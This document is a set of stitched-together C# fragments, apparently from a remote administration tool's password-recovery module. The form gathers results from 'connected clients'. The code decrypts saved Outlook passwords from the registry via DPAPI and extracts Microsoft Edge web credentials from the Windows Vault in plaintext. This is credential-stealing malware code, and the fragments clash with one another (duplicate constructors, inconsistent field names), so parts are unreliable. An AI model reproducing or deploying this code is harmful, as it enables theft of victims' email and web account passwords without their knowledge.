public FrmPasswordRecovery(Client[] connectedClients) { _clients = connectedClients; foreach (Client client in _clients) { if (client == null || client.Value == null) { continue; } client.Value.FrmPass = this; } InitializeComponent(); Text = WindowHelper.GetWindowTitle("Password Recovery", _clients.Length); txtFormat.Text = Settings.SaveFormat; _noResultsFound = new RecoveredAccount() { Application = "No Results Found", Url = "N/A", Username = "******", Password = "******" }; }
private static List <RecoveredAccount> LoadFromRegistry(string baseRegKey) { var key = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Default); key = key.OpenSubKey(baseRegKey); var retVal = new List <RecoveredAccount>(); foreach (var accountKey in GetAccountKeys(key)) { var acc = new RecoveredAccount { Application = "Outlook" }; foreach (var valName in accountKey.GetValueNames()) { if (valName.ToLower().Contains("password")) { var encVal = accountKey.GetValue(valName) as byte[]; acc.Password = Encoding.Unicode.GetString(ProtectedData.Unprotect(encVal.Skip(1).ToArray(), null, DataProtectionScope.LocalMachine)).Trim('\0'); } else if (valName.ToLower().Contains("email")) { acc.Username = Encoding.Unicode.GetString(accountKey.GetValue(valName) as byte[]).Trim('\0'); } } retVal.Add(acc); } return(retVal); }
private string ConvertToFormat(string format, RecoveredAccount login) { return(format .Replace("APP", login.Application) .Replace("URL", login.URL) .Replace("USER", login.Username) .Replace("PASS", login.Password)); }
public FrmPasswordRecovery(ClientMosaique client) { _client = client; InitializeComponent(); client.value.frmPr = this; //txtFormat.Text = ListenerState.SaveFormat; _noResultsFound = new RecoveredAccount() { application = "No Results Found", URL = "N/A", username = "******", password = "******" }; }
public static List <RecoveredAccount> GetPasswords() { var retList = new List <RecoveredAccount>(); try { int count; IntPtr items; if (NtSuccess(VaultEnumerateVaults(0, out count, out items))) { for (var i = 0; i < count; i++) { IntPtr hVault; if (NtSuccess(VaultOpenVault(items + i * Marshal.SizeOf(typeof(Guid)), 0, out hVault))) { IntPtr pItems; int itemCount; if ( NtSuccess(VaultEnumerateItems(hVault, 512 /* VAULT_ENUMERATE_ALL_ITEMS */, out itemCount, out pItems))) { for (var j = 0; j < itemCount; j++) { var vaultItem = (VAULT_ITEM) Marshal.PtrToStructure(pItems + j * Marshal.SizeOf(typeof(VAULT_ITEM)), typeof(VAULT_ITEM)); var acc = new RecoveredAccount(); // We're only interested in web credentials if (vaultItem.SchemaId.Equals(new Guid(VaultWebCredentialId))) { acc.Application = "Microsoft Edge"; acc.URL = Marshal.PtrToStringUni(vaultItem.ResourceElement + 32); acc.Username = Marshal.PtrToStringUni(vaultItem.IdentityElement + 32); var pPasswVaultItem = IntPtr.Zero; if ( NtSuccess(VaultGetItem(hVault, ref vaultItem.SchemaId, vaultItem.ResourceElement, vaultItem.IdentityElement, IntPtr.Zero, 0, 0, ref pPasswVaultItem))) { var passwVaultItem = (VAULT_ITEM)Marshal.PtrToStructure(pPasswVaultItem, typeof(VAULT_ITEM)); acc.Password = Marshal.PtrToStringUni(passwVaultItem.AuthenticatorElement + 32); VaultFree(pPasswVaultItem); retList.Add(acc); } } } } VaultCloseVault(hVault); } } } } catch { } return(retList); }